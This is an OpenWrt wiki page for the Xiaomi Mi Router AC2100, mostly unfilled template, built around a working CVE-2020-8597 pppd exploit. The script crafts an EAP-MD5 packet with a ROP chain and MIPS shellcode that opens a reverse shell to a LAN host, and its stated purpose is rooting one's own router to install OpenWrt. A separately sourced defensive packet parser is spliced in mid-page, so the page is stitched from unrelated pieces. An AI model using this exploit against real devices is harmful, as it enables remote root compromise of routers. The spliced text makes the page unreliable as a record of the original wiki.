Xiaomi Mi Router AC2100

Under Construction!
This page is currently under construction. You can edit the article to help completing it.

The Xiaomi Mi Router AC2100 is a wireless router based on the MediaTek MT7621 platform. From a technical standpoint, the specs of the Xiaomi Mi Router AC2100 are nearly identical to those of the Redmi AC2100. It runs Xiaomi Router firmware by default and, like the Redmi, it requires a simple PPPoE exploit (CVE-2020-8597 in the stock pppd) to obtain a shell and flash OpenWrt from the command line.

Support Forums https://forum.openwrt.org/t/new-xiaomi-router-ac2100

Xiaomi Mi Router AC2100

None at this time.

Model             Version  SoC               CPU MHz  Flash MB  RAM MB  WLAN Hardware                         WLAN2.4  WLAN5.0  100M ports  Gbit ports  Modem  USB
Mi Router AC2100  -        MediaTek MT7621A  880      128 NAND  128     MediaTek MT7603, MediaTek MT7615      b/g/n    a/n/ac   -           4           -      -

unofficial stable build


Software Preparation

  • Two ethernet cables
  • Python 3 installed on your PC
  • Download OpenWrt firmware from this page
  • A script that implements CVE-2020-8597 (see below)

A PoC of CVE-2020-8597, from a GitHub Gist

You need to change the interface variable to match the name of the interface connected to the Xiaomi router. Also, change the (beginning of the) MAC address on the line if src.startswith("88:c3:97") to match your router. The full MAC address of the router is printed on a sticker attached to the router.

There is a good AC2100-OpenWRT-Guide on GitHub with pictures explaining the installation procedure.

from scapy.all import *
from socket import *

interface = "enp0s31f6"

def mysend(pay,interface = interface):
    sendp(pay, iface = interface)

def packet_callback(packet):

    global sessionid, src, dst
    sessionid = int(packet['PPP over Ethernet'].sessionid)
    dst = (packet['Ethernet'].dst)
    src = (packet['Ethernet'].src)
    # In case we pick up Router -> PPPoE server packet
    if src.startswith("88:c3:97") :
        src,dst = dst,src
    print("sessionid:" + str(sessionid))
    print("src:" + src)
    print("dst:" + dst)

def eap_response_md5():

    md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"

    # Reverse shell, connect to 192.168.31.177:31337

    stg3_SC =  b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"

    reboot_shell =  b"\x23\x01\x06\x3c"
    reboot_shell += b"\x67\x45\xc6\x34"
    reboot_shell += b"\x12\x28\x05\x3c"
    reboot_shell += b"\x69\x19\xa5\x24"
    reboot_shell += b"\xe1\xfe\x04\x3c"
    reboot_shell += b"\xad\xde\x84\x34"
    reboot_shell += b"\xf8\x0f\x02\x24"
    reboot_shell += b"\x0c\x01\x01\x01"

    #Debug sleep
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    #s2 = b"\x03\x00\x00\x00"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"

    #Debug reboot
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\xB0\x9B\xEB\x77" # uclibc reboot(s2) base + 0xfbb0 = 77EB9BB0
    #s2 = b"\x67\x45\x23\x01"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"

    #ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9

    s0 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    s1 = b"\x01\x00\x00\x00"
    s2 = b"\x41\x41\x41\x41"
    s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp 00000000 00:00 0          [stack]
    s4 = b"\x88\xe1\x40\x00" # pppd.txt:0x0040e188
    s5 = b"\x00\x00\x00\x00"

    ra = b"\x0C\x81\xF1\x77" # libuClibc.txt:0x0006e10c 77F1810C

    rop_chain =  (b'A' * 0x184)
    rop_chain += s0
    rop_chain += s1
    rop_chain += s2
    rop_chain += s3
    rop_chain += s4
    rop_chain += s5
    rop_chain += ra
    # Nop slide
    rop_chain += (b'\x00' * 0x100)
    # Small reboot shellcode for testing
    #rop_chain += reboot_shell
    rop_chain += stg3_SC
    # Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop
    rop_chain += (b'\x00' * 0x4)
    pay = Ether(dst=dst,src=src,type=0x8864)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain)
    mysend(pay)


if __name__ == '__main__':
    sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1)

    eap_response_md5()
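The script above only works because the stock pppd accepts an EAP-MD5 response whose name field is far longer than its 256-byte rhostname buffer. As an added example (not part of the wiki page or the gist), the following stand-alone parser dissects a PPPoE session frame down to the EAP-MD5 response and flags oversized name fields, which is what a defender would look for on the wire; it uses no scapy, the frame layouts follow RFC 2516, RFC 1661 and RFC 3748, the MAC addresses are constructed placeholders, and the 255-byte threshold is an assumption chosen from pppd's buffer size.

```python
import struct

ETH_P_PPPOE_SESSION = 0x8864     # EtherType for the PPPoE session stage
PPP_PROTO_EAP = 0xC227           # PPP protocol number carrying EAP
EAP_CODE_RESPONSE = 2
EAP_TYPE_MD5_CHALLENGE = 4
MAX_SANE_NAME_LEN = 255          # assumed: pppd copies the name into a 256-byte stack buffer


def parse_pppoe_eap(frame: bytes):
    """Return a dict describing an EAP-MD5 response inside a PPPoE session
    frame, or None if the frame is anything else (or truncated)."""
    if len(frame) < 28 or struct.unpack("!H", frame[12:14])[0] != ETH_P_PPPOE_SESSION:
        return None
    ver_type, code, session_id, pppoe_len = struct.unpack("!BBHH", frame[14:20])
    if ver_type != 0x11 or code != 0x00:          # PPPoE v1/type1, session data
        return None
    ppp = frame[20:20 + pppoe_len]
    if len(ppp) < 8 or struct.unpack("!H", ppp[:2])[0] != PPP_PROTO_EAP:
        return None
    eap = ppp[2:]
    eap_code, eap_id, eap_len, eap_type, value_size = struct.unpack("!BBHBB", eap[:6])
    if eap_code != EAP_CODE_RESPONSE or eap_type != EAP_TYPE_MD5_CHALLENGE:
        return None
    name = eap[6 + value_size:eap_len]            # everything after the MD5 value is the name
    return {"session_id": session_id, "dst_mac": frame[0:6].hex(":"),
            "eap_id": eap_id, "value_size": value_size, "name_len": len(name)}


def is_cve_2020_8597_candidate(frame: bytes) -> bool:
    """True when an EAP-MD5 response carries a name longer than any sane peer would send."""
    info = parse_pppoe_eap(frame)
    return info is not None and info["name_len"] > MAX_SANE_NAME_LEN


def build_frame(name: bytes, session_id: int = 1) -> bytes:
    """Constructed test frame (not captured traffic): server -> router EAP-MD5 response."""
    md5 = bytes(range(1, 17))                     # 16-byte dummy MD5 value
    body = bytes([EAP_TYPE_MD5_CHALLENGE, len(md5)]) + md5 + name
    eap = struct.pack("!BBH", EAP_CODE_RESPONSE, 100, 4 + len(body)) + body
    ppp = struct.pack("!H", PPP_PROTO_EAP) + eap
    pppoe = struct.pack("!BBHH", 0x11, 0x00, session_id, len(ppp)) + ppp
    dst = bytes.fromhex("88c397000001")           # constructed router MAC (88:c3:97 prefix as on the page)
    src = bytes.fromhex("001122334455")           # constructed server MAC
    return dst + src + struct.pack("!H", ETH_P_PPPOE_SESSION) + pppoe


if __name__ == "__main__":
    for label, n in (("normal", b"user"), ("oversized", b"A" * 0x184 + b"\x00" * 0x100)):
        print(label, parse_pppoe_eap(build_frame(n)), is_cve_2020_8597_candidate(build_frame(n)))
```

Feed real frames to parse_pppoe_eap from a pcap reader of your choice; anything flagged by is_cve_2020_8597_candidate should never appear on a healthy WAN link.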

FIXME Enter values for “FILL-IN” below

Bootloader tftp server IPv4 address FILL-IN
Bootloader MAC address (special) FILL-IN
Firmware tftp image Latest OpenWrt release (NOTE: Name must contain “tftp”)
TFTP transfer window FILL-IN seconds
TFTP window start approximately FILL-IN seconds after power on
TFTP client required IP address FILL-IN

generic.sysupgrade

FIXME These are generic instructions. Update with your router's specifics.

  • Browse to the LuCI Upgrade URL http://192.168.1.1/cgi-bin/luci/mini/system/upgrade/
  • Upload image file for sysupgrade to LuCI
  • Wait for reboot

If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line. There are two command line methods for upgrading:

  • sysupgrade
  • mtd

Note: It is important that you put the firmware image into the ramdisk (/tmp) before you start flashing.

sysupgrade

  • Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp
wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc
sysupgrade /tmp/xxx.abc

mtd

If sysupgrade does not support this router, use mtd.

  • Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp
wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc
mtd write /tmp/xxx.abc linux && reboot

Basic configuration: after flashing, proceed with this.
Set up your Internet connection, configure wireless, configure the USB port, etc.

FIXME Please fill in real values for this device, then remove the EXAMPLEs

The default network configuration is:

Interface Name Description Default configuration
br-lan EXAMPLE LAN & WiFi EXAMPLE 192.168.1.1/24
vlan0 (eth0.0) EXAMPLE LAN ports (1 to 4) EXAMPLE None
vlan1 (eth0.1) EXAMPLE WAN port EXAMPLE DHCP
wl0 EXAMPLE WiFi EXAMPLE Disabled

FIXME Please fill in real values for this device, then remove the EXAMPLEs

Numbers 0-3 are Ports 1-4 as labeled on the unit, number 4 is the Internet (WAN) on the unit, 5 is the internal connection to the router itself. Don't be fooled: Port 1 on the unit is number 3 when configuring VLANs. vlan0 = eth0.0, vlan1 = eth0.1 and so on.

Port Switch port
Internet (WAN) EXAMPLE 4
LAN 1 EXAMPLE 3
LAN 2 EXAMPLE 2
LAN 3 EXAMPLE 1
LAN 4 EXAMPLE 0

See hardware.button for how to use and configure the hardware button(s). Here we merely name the buttons so we can use them in the above howto.

FIXME Please fill in real values for this device, then remove the EXAMPLEs

The Xiaomi Mi Router AC2100 has the following buttons:

BUTTON Event
EXAMPLE Reset reset
EXAMPLE Secure Easy Setup ses
EXAMPLE No buttons at all. -

FIXME

  1. This table is automatically generated, once the correct filters for Brand and Model are set.
  2. If you see “Nothing.” instead of a table, please edit this section and adjust the filters with the proper Brand and Model. Just try, it's easy.
  3. If you still don't see a table here, or a table filled with '¿': Is there already a Techdata page available for the Xiaomi Mi Router AC2100? If not: Create one.
  4. If you see a table with the desired device data, everything is OK and you can delete this text and the <WRAP> that encloses it.
  5. If it still doesn't work: Don't panic, calm down, take a deep breath and contact a wiki admin (tmomas) for help.
Nothing.

Front:
Insert photo of front of the casing

Back:
Insert photo of back of the casing

Backside label:
Insert photo of backside label

Note: This will void your warranty!

FIXME Describe what needs to be done to open the device, e.g. remove rubber feet, adhesive labels, screws, …

  • To remove the cover and open the device, do a/b/c

Main PCB:
Insert photo of PCB

See port.serial for general information about the serial port, serial port cable, etc.

How to connect to the Serial Port of this specific device:
Insert photo of PCB with markings for serial port

FIXME Replace EXAMPLE by real values.

Serial connection parameters
for Xiaomi Mi Router AC2100 @@Version@@
EXAMPLE 115200, 8N1

See port.jtag for general information about the JTAG port, JTAG cable, etc.

How to connect to the JTAG Port of this specific device:
Insert photo of PCB with markings for JTAG port

None so far.

COPY HERE THE BOOTLOG WITH THE ORIGINAL FIRMWARE


COPY HERE THE BOOTLOG ONCE OPENWRT IS INSTALLED AND RUNNING


Space for additional notes, links to forum threads or other resources.

FIXME Add tags below, then remove this fixme.

How to add tags

  • Last modified: 2020/12/17 06:47
  • by lessload